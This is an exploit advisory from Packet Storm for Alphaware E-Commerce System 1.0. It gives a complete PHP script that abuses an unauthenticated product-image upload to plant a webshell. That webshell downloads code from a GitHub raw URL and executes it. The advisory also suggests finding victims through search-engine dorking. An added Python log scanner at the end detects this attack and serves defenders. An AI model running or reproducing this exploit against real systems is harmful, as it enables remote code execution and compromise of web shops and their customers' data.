Source: packetstorm, author indoushka, ID PACKETSTORM:180292
Published: Aug 21, 2024 - 12:00 a.m.

Alphaware E-Commerce System 1.0 Code Injection


`=============================================================================================================================================  
| # Title : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or another search engine.  
  
[+] This payload injects PHP code of your choice into a SHELL.php file.  
  
[+] The web application allows an unauthenticated file upload, which can result in remote code execution.  
Combine this issue with an SQL injection to retrieve the randomised name of our uploaded PHP shell.  
  
[+] save payload as poc.php  
  
[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1  
  
[+] payload :   
  
<?php  
  
function file_upload($target_ip) {  
$file_name = "indoushka.php";  
  
$webshell_payload = "<?php  
\$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';  
\$ch = curl_init();  
curl_setopt(\$ch, CURLOPT_URL, \$url);  
curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);  
\$output = curl_exec(\$ch);  
curl_close(\$ch);  
if (\$output) {  
// Include the fetched remote content so it runs as PHP code  
include 'data://text/plain;base64,' . base64_encode(\$output);  
}  
?>";  
  
$post_fields = array(  
'add' => '',  
'product_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),  
'product_name' => 'inouva',  
'product_price' => '123',  
'product_size' => '99',  
'brand' => 'N0_name',  
'category' => 'Hackers',  
'qty' => '1'  
);  
  
echo "(+) PHP Code Injection ...\n";  
  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "http://$target_ip/alphaware/admin/admin_football.php");  
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
  
$response = curl_exec($ch);  
curl_close($ch);  
  
echo "(+) Shell uploaded successfully.\n";  
echo "(+) Access the shell at: http://$target_ip/alphaware/photo/$file_name\n";  
}  
  
if ($argc != 2) {  
echo "(+) Usage: php " . $argv[0] . " <target ip>\n";  
echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";  
exit(-1);  
}  
  
$target_ip = $argv[1];  
file_upload($target_ip);  
  
  
[+] Path : http://127.0.0.1/alphaware/photo/  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`
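For defenders reviewing a host that runs this application, the two paths in the PoC give a log signature: a POST to `/alphaware/admin/admin_football.php` and a request for a script file under `/alphaware/photo/`. The following is an added example, not part of the original advisory; it assumes Apache/nginx "combined" access logs, and the sample lines, addresses and file names are constructed.

```python
import re

# Paths come from the advisory; the "combined" log format is an assumption.
UPLOAD_ENDPOINT = "/alphaware/admin/admin_football.php"
UPLOAD_DIR = "/alphaware/photo/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def scan(lines):
    """Return (uploads, executions): POSTs to the upload endpoint, and
    requests for script files inside the image directory."""
    uploads, executions = [], []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        path = m["target"].split("?", 1)[0]  # ignore the query string
        event = (m["ip"], m["ts"], m["method"], path, int(m["status"]))
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT:
            uploads.append(event)
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            executions.append(event)
    return uploads, executions

def correlated(uploads, executions):
    """Clients that posted to the endpoint and also requested a script in the image directory."""
    posters = {u[0] for u in uploads}
    return sorted({e[0] for e in executions if e[0] in posters})

# Constructed sample log lines (documentation address ranges, made-up file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Aug/2024:10:01:02 +0000] "GET /alphaware/photo/shoe1.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Aug/2024:10:02:11 +0000] "POST /alphaware/admin/admin_football.php HTTP/1.1" 200 5120 "-" "curl/8.4.0"',
    '198.51.100.7 - - [21/Aug/2024:10:02:15 +0000] "GET /alphaware/photo/upload_7f3a.php?x=1 HTTP/1.1" 200 17 "-" "curl/8.4.0"',
    '192.0.2.10 - - [21/Aug/2024:10:03:00 +0000] "GET /alphaware/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    ups, execs = scan(SAMPLE_LOG)
    for e in ups + execs:
        print(e)
    print("correlated clients:", correlated(ups, execs))
```

POSTs to the endpoint also include legitimate admin activity, so treat that list as triage input; any script request under the image directory is the stronger signal, since that directory should only ever serve images.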
